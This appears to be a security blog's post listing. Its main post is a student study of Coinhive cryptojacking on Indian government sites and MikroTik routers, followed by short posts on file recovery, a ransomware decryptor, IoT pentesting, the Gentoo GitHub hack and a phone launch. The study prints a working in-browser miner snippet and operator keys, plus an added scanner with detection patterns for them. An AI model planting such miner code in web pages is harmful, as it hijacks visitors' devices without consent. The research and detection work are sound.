Cryptojacking and India - Government Websites Are Being Used to Mine Cryptocurrency and Routers Are Used to Spread Cryptojacking Malware



Ever since Coinhive launched its service in September 2017, cryptojacking has been getting very popular (mostly for bad purposes). Earlier, people used to mine cryptocurrencies using their own hardware, but as the mining difficulty increased, so did the hardware requirements. Services like Coinhive gave people the power to use someone else's system to mine cryptocurrency and make money.

What Is Cryptojacking?


Cryptojacking is defined as the secret use of a user's computing device to mine cryptocurrency. It used to be confined to the victim unknowingly installing a program that secretly mines cryptocurrency. In-browser cryptojacking does not need any program to be installed, which makes it more worrying.

In the last few months we saw a lot of news regarding cryptojacking. A few examples:

1. Cryptojacking rates increased by 85 times in Q4 2017 as bitcoin prices spiked: report
2. Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit

It is a new topic, not much research has been done on it, and because it helps hackers make money anonymously, a lot of hackers are into it.

As I'm in my final year of Computer Science (undergraduate), I, together with two of my friends, Shakil Ahmed and Anisha Sharma, decided to do research on the topic Cryptojacking: its detection and prevention.

Before moving ahead with our research we wanted to do a small experiment to see whether Indian websites (mainly government websites) and systems are infected with cryptominers, and what the impact is.

The Experiment


Our first aim was to make a list of all the government websites of India and see if they are infected by cryptominers. We searched online for a list of government websites but did not find one, so we headed over to goidirectory.nic.in, which lists all government websites. From that website we got around 4,000+ Indian government websites.

The next step was to see if the websites have any cryptojacking scripts in them. Today there are many services which allow users to create an account and start using their cryptomining scripts. The most popular among them is CoinHive.com. So for our experiment we checked for “coinhive.min.js”, which is the original Coinhive JavaScript library used in cryptojacking.

It was not a deep analysis: in our experiment we only checked the HTML of the homepage of each website, so if the script was not present on the homepage we moved on to the next one. We skipped sub-domains too.

We found the following two websites infected by a cryptojacker:

1. http://cdma.ap.gov.in 

It is a subdomain of ap.gov.in, which has a global ranking of 2495 (Alexa). According to SimilarWeb, cdma.ap.gov.in gets more than 160k+ visits per month (Source). Since a lot of people visit the website, it is a perfect target for a hacker, as more views means more money.

cdma.ap.gov.in affected by cryptojacking


We did a reverse IP lookup on the website and found two more websites:

  a. tirupati.cdma.ap.gov.in
  b. http://macherla.cdma.ap.gov.in/

Both of them were infected by cryptojacking scripts.

2. http://www.ngcnalgonda.org

It is the website of Nagarjuna Government College, Nalgonda.


Here is what a Coinhive script looks like:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('USER ID', {throttle: 0.3});
 // Only start on non-mobile devices and if not opted-out
 // in the last 14400 seconds (4 hours):
 if (!miner.isMobile() && !miner.didOptOut(14400)) {
  miner.start();
 }
</script>


In Coinhive each user has their own unique USER ID, so we decided to dig further and see how many other websites were infected by the same person who infected the above-mentioned websites.

Here are the Coinhive USER IDs of the above websites:

1. http://cdma.ap.gov.in -- T9UtNcvcu9o197o4xvHWm49rC3Ba81QR
2. http://www.ngcnalgonda.org -- FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde

We used PublicWWW to see how many other websites were infected by these two users.

1. T9UtNcvcu9o197o4xvHWm49rC3Ba81QR  -- 36 Websites 
2. FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde -- 49 Websites
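The homepage check and the per-USER-ID grouping described above, written out as a small offline scanner. This is an added example and not the authors' own tooling: it looks for a coinhive.min.js script tag in already-fetched HTML, pulls the USER ID out of the CoinHive.Anonymous(...) call, and groups the hits by that ID so you can see how many sites share one operator. The sample pages embedded in the script are constructed, and the site keys in them are made-up placeholders, not the IDs reported above.

```python
"""Scan fetched homepages for Coinhive cryptojacking scripts and group hits by USER ID.

Added example (not the article authors' tooling). Works on already-fetched
HTML so it runs offline; the sample pages below are constructed and the
site keys in them are placeholders, not real Coinhive IDs.
"""
import re
from collections import defaultdict

# The loader the article looked for (coin-hive.com/lib/coinhive.min.js); the
# pattern only pins the file name so self-hosted copies are caught as well.
MINER_SCRIPT_RE = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']([^"']*coinhive\.min\.js)["']""",
    re.IGNORECASE,
)

# CoinHive.Anonymous('<USER ID>', {...}): the ID names the account that is
# credited for the mining, so it ties separate infections to one operator.
SITE_KEY_RE = re.compile(
    r"""CoinHive\.Anonymous\(\s*["']([A-Za-z0-9]{8,64})["']""",
)


def find_miner(html):
    """Return {'script': url, 'site_key': id_or_None} if a miner is present, else None."""
    m = MINER_SCRIPT_RE.search(html)
    if not m:
        return None
    k = SITE_KEY_RE.search(html)
    return {"script": m.group(1), "site_key": k.group(1) if k else None}


def scan_sites(pages):
    """pages: iterable of (url, html). Returns (hits, by_key).

    hits   -- list of (url, finding) for every page that loads the miner
    by_key -- dict USER ID -> sorted list of urls, i.e. sites per operator
    """
    hits = []
    by_key = defaultdict(list)
    for url, html in pages:
        finding = find_miner(html)
        if finding is None:
            continue
        hits.append((url, finding))
        if finding["site_key"]:
            by_key[finding["site_key"]].append(url)
    return hits, {k: sorted(v) for k, v in by_key.items()}


# Constructed sample homepages (not real fetched content). Two of them carry
# the same placeholder ID, which is what the PublicWWW step above was counting.
SAMPLE_PAGES = [
    ("http://example-a.gov.test", """<html><head>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLEKEYAAAAAAAAAAAAAAAAAAAAAA', {throttle: 0.3});
miner.start();</script></head><body>Welcome</body></html>"""),
    ("http://example-b.gov.test", """<html><body><h1>Notices</h1></body></html>"""),
    ("http://example-c.org.test", """<html><head>
<SCRIPT SRC='/static/js/coinhive.min.js'></SCRIPT>
<script>var m=new CoinHive.Anonymous("EXAMPLEKEYAAAAAAAAAAAAAAAAAAAAAA");m.start();</script>
</head></html>"""),
    ("http://example-d.org.test", """<html><head>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>new CoinHive.Anonymous('EXAMPLEKEYBBBBBBBBBBBBBBBBBBBBBB').start();</script>
</head></html>"""),
]


if __name__ == "__main__":
    hits, by_key = scan_sites(SAMPLE_PAGES)
    for url, f in hits:
        print(f"{url}: loads {f['script']} (USER ID {f['site_key']})")
    for key, urls in by_key.items():
        print(f"USER ID {key}: {len(urls)} site(s)")
```

To reproduce the experiment against a real list, fetch each homepage yourself and feed the (url, html) pairs into scan_sites. Like the original check, this only inspects the HTML that was fetched, so a miner loaded from a second-stage script or injected later by an upstream device (the MikroTik case below) will not show up unless that response is what you captured.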

From this experiment it is clear that hackers are now targeting government websites for mining cryptocurrency, as those websites get high traffic and most people trust them. Earlier we saw a lot of government websites getting defaced, but now injecting cryptojackers is the trend, as it makes money for the hacker.

After this experiment on government websites, we tried to see if any Indian systems are affected by cryptojackers. A few days earlier we had read the following news: Hackers Infect Over 200,000 MikroTik Routers With Crypto Mining Malware.

We used shodan.io to see how many routers are currently infected and where they are located, using the following search query: http.component:"coinhive" product:"MikroTik http proxy"



To our surprise, India ranked second, with more than 13,500 routers affected by cryptojackers, which spread it further among their users. Top cities include:

1. Raipur
2. Pune
3. Udaipur
4. Mumbai

Conclusion


Through our experiment we learned that cryptojacking is spreading fast because it is profitable, and the majority of people are unaware of it and don't know how to prevent it. There was a time when hackers used to deface websites, which was easy to detect. Now they simply add cryptojacking scripts to compromised websites, making them difficult for users and website owners to detect.

Support our research by donating ETH:

ETH Address : 0xDB6ec3eFD47EC5971FA05b13C8c159Eb2E2547BF

How to recover permanently deleted files in Windows [Full Guide]



Our files are very important to us. These days we store a lot of information on our PCs, be it our favourite photos, our tax details, academic records, etc. But often, for some reason, they get deleted. I'm sure you have faced a situation where you deleted a file to free up some space, only to realise later that you actually needed it. I guess I'm not the only one who does this often. For this reason Windows came up with the Recycle Bin feature, so that at least you can restore files.

But, but, but (I know you have guessed it already): what if we permanently deleted the files, or what if our hard disk crashed and all our data is gone? In such cases we often feel lost, as our data is gone and there seems to be no way to recover it. Well, it's not the end of the world. There is something called data recovery software which helps users recover permanently deleted files. Don't expect it to recover all of your files, but hey, something is better than nothing. Right?




If your hard disk keeps on crashing you should definitely check this article: 5 Best External Hard Drives To Buy In 2018


In this article I'll be showing you a program called EaseUS Data Recovery Wizard which can help you recover permanently deleted files. EaseUS Data Recovery Wizard Free makes the task of recovering deleted data a breeze. The interface of the program is quite user-friendly, and the recovered files are displayed in a typical Explorer format. EaseUS Data Recovery Wizard can typically recover files from:

  • An existing partition
  • Deleted data from a deleted partition
  • Deleted data from a corrupted partition
  • Deleted data from a partition that had been deleted, then overwritten with another.

Here is a step-by-step guide on how you can use it:


Step 1: Download and install the software. This is what the first screen looks like.

 
Here you need to select the folder in which your deleted files were located.

Step 2: Now it will start scanning; you can see the progress bar at the top.


Step 3: After the quick scan is done, the software will show you the deleted files it found. If you have not yet found your file, you can go for a deep scan.


Step 4: Now you can see a preview of the deleted files. You can recover a file by clicking the Recover button.


Step 5: Once the preview or search is complete, select the target files and press the Recover button to recover them and save them to your computer or a storage device. At this point, make sure you save all recovered files to a different disk, to avoid overwriting the data you are trying to recover.


Decryption Tool for LockCrypt Ransomware released



Popular antivirus company Bitdefender has released a decryption tool which can recover files encrypted by the LockCrypt ransomware. The catch is that it can only decrypt files encrypted by an older version of LockCrypt that locks files with the .1btc extension.

The Bitdefender decryption tool may not be useful for current victims of the LockCrypt ransomware, but users who still have copies of their (.1btc) encrypted files can use it to recover files. Using the tool is pretty simple, as the interface is self-explanatory.

The LockCrypt ransomware is a ransomware strain that infects victims after hackers use brute-force attacks to break into companies' networks via RDP connections, and then manually run the ransomware's binary.


LockCrypt version   Status
.BI_D               Not decryptable
.1btc               Decryptable using Bitdefender tool
.lock               Decryptable (contact Michael Gillespie)
.2018               Decryptable (contact Michael Gillespie)
.mich               Decryptable (contact Michael Gillespie)

The ransomware was first spotted in June 2017, and security researchers tracked its authors to a group that was previously active on the Satan Ransomware-as-a-Service portal.

IoT Penetration Testing Full Guide



IoT pentesting is a new domain that has entered penetration testing. With the growing risk to IoT security and attacks on various IoT devices, pentesters are often asked by companies to check their systems. But the problem is that most security service providers do not yet have IoT specialists for testing; it is usually done by the regular security team. In this article we will try to see what exactly IoT penetration testing is.

The difficulty level and the steps for performing the testing are broadly similar to those of regular testing, but if you are discovering flaws by analyzing firmware or wireless communications, it gets harder.

The benefits of pentesting IoT include strengthening device security, protecting against unauthorized usage, avoiding elevation of privileges, reducing the risk of compromise, better user and data privacy, and setting up strong encryption to avoid man-in-the-middle (MITM) attacks.


Most of the current research focuses on vulnerabilities in the device itself, but it is important to look at other areas too. Areas pentesters need to focus on:


  • The devices themselves
  • The operating system that runs on the devices
  • The software on the devices
  • The mobile application
  • The servers themselves
  • The build on the servers

Basic IoT Architecture


An attacker has many ways to breach an IoT system, as its architecture comprises a number of elements, each of which is a potential target.

IoT architecture consists of the following components :


Things: Smart devices equipped with sensors and actuators.

IoT field Gateways: Border elements that provide connectivity between things and the cloud part of an IoT solution.

Cloud gateways: Components facilitating data compression and transmission between the gateways and cloud servers.

Streaming data processor: An element ensuring a smooth transition of input data to a big data warehouse and control applications.

Data storage: Consists of a data lake (stores unprocessed data in the form of “streams”) and a big data warehouse (stores filtered and structured data, as well as context information about smart devices, sensors, commands from control applications).

Data analytics: A unit that uses information from the big data warehouse to establish data patterns and gain meaningful insights.

Machine learning: Generates and regularly updates models based on the historical data accumulated in a big data warehouse which is used by control applications.

Control applications: Components that send automatic commands and alerts to actuators.

Client-server system: Consists of a user business logic component (the server side), a mobile application and a web application (the client side).





Penetration testing is executed on the following elements of things:

  • UART, JTAG, SWD ports. Exposed ports allow a pentester to get root access, view and modify sensitive data.
  • Flash memory chips, to check whether the firmware can be dumped.
  • Bus sniffing. Hackers may sniff clear text data between components and get access to sensitive information.



Book to follow


IoT is an interesting yet hard topic to follow. Here is a book I recommend for learning more about IoT, written by popular security researcher Aditya Gupta, who is an expert in IoT pentesting.














Here is how Gentoo Linux Github Account was hacked



If you read a lot of infosec news then I'm sure you have heard that the official GitHub account of the popular Linux distribution Gentoo Linux was hacked last week. After the account was hacked, the hacker changed some code and added malicious scripts that delete all of the user's files.

Gentoo is a free operating system with precompiled binaries, and it is an ideal secure server for development workstations, professional desktops, gaming systems and embedded solutions.

The incident took place on 28 June at approximately 20:20 UTC and Gentoo regained control by 2018-06-28 23:10 UTC.

According to Gentoo, the hack did not affect the code hosted on the Gentoo infrastructure; the code hosted on GitHub is just a mirror. Gentoo.org was not compromised.

How did they get hacked?


Gentoo developers have revealed that the attackers were able to gain administrative privileges for its GitHub account after guessing the account password. It's 2018, and I don't know why organisations like Gentoo do not use two-factor authentication.

The organisation could have been saved if it had been using two-factor authentication, which requires an additional passcode besides the password in order to gain access to the account.

Steps taken to prevent future attacks


After this incident, Gentoo took the following steps to protect themselves from future attacks:


  • Making frequent backups of its GitHub Organization.
  • Enabling two-factor authentication by default in Gentoo's GitHub Organization, which will eventually come to all users of the project's repositories.
  • Working on an incident response plan, particularly for sharing information about a security incident with users.
  • Tightening up procedures around credential revocation.
  • Reducing the number of users with elevated privileges, auditing logins, and publishing password policies that mandate password managers.
  • Introducing support for hardware-based 2FA for Gentoo developers.




Xiaomi's Mi 8 flagship sells out in 1 minute and 37 seconds



Currently Huawei is the biggest smartphone brand in China, but Xiaomi's new flagship Mi 8 has created a storm there. The Mi 8 went on sale on 5 June and, according to Xiaomi, sold out in just 1 minute and 37 seconds. A lot of people are interested in this device because it provides a lot of high-end specs at a minimal price. As a matter of fact, the Mi 8 starts at just CNY 2,699 (approx. Rs 28,000), which makes it the cheapest smartphone to come with a Snapdragon 845 SoC. This phone can really bring the competition to the OnePlus 6.

Here are the specs of the Mi 8:



Xiaomi Mi 8 Specifications

Dimensions and weight   154.9 x 74.8 x 7.6 mm, 175g
Software                MIUI 10 on top of Android 8.1 Oreo
CPU                     Octa-core Qualcomm Snapdragon 845 (4x 2.8GHz Kryo 385 Gold + 4x 1.8GHz Kryo 385 Silver cores)
GPU                     Adreno 630
RAM and storage         6GB of RAM with 64GB/128GB/256GB of storage; Mi 8 Explorer Edition: 8GB of RAM with 128GB of storage
Battery                 3400mAh, Quick Charge 4.0+ (Quick Charge 3 adapter bundled in the box)
Display                 6.21-inch Full HD+ (2248×1080) AMOLED, 600 nits brightness, supports HDR10, DCI-P3 gamut
Wi-Fi                   802.11ac
Bluetooth               Bluetooth 5.0
Ports                   USB Type-C port, dual nano SIM slots
Bands                   GSM: 850/900/1800/1900MHz
                        WCDMA: 850/900/1700/1900/2100MHz
                        FDD-LTE: Bands 1/2/3/4/5/7/8/12/17/20
                        TDD-LTE: Bands 34/38/39/40/41
Rear camera             12MP camera with 1.4μm pixels, f/1.8 aperture, Dual Pixel autofocus, 4-axis OIS
                        12MP telephoto camera with f/2.4 aperture, 2x optical zoom
Video recording         Up to 4K at 60FPS, slow motion at 1080p240
Front-facing camera     20MP front-facing camera, uses pixel binning to simulate 1.8μm pixels, f/1.8 aperture


Xiaomi states that the Mi 8 is the world’s first smartphone to support dual-frequency GPS. It uses the newer, more powerful L5 band on top of the common L1 band to increase navigation accuracy by three to five times.




The Xiaomi Mi 8 will be available in three variants: 6GB of RAM with 64GB/128GB/256GB of storage. The 64GB storage variant costs CNY 2699 ($420), while the 128GB storage and 256GB storage variants will be available for CNY 2999 ($468) and CNY 3299 ($515) respectively.